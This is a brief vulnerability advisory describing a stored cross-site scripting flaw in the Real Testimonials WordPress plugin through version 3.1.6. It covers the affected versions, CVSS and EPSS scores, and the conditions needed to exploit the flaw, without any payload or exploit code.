The Real Testimonials plugin for WordPress contains a stored cross‑site scripting flaw that allows malicious script code to be saved in testimonial entries. When a page displays a testimonial, the unfiltered input is rendered directly, so any injected JavaScript will execute in visitors' browsers. This can lead to credential theft, session hijacking, defacement, or malware delivery. The weakness is a classic input validation issue identified as CWE‑79.

The vulnerability exists in all versions of the Real Testimonials plugin distributed by ShapedPlugin LLC up to and including version 3.1.6. Any WordPress site that installs or updates to a version in that range and accepts user‑generated testimonial content is affected.

The CVSS v3.1 score of 6.5 indicates moderate severity. The EPSS score is less than 1 %, suggesting a low current exploitation probability, and the flaw is not listed in the CISA KEV catalog. Based on the description, it is inferred that an attacker who can create or edit testimonials can inject the malicious payload, and from that the stored XSS will be triggered when the content is displayed to other site visitors. The exploitation therefore requires the ability to submit testimonial data, which is typically a role that may be limited but is not explicitly denied by the CVE data.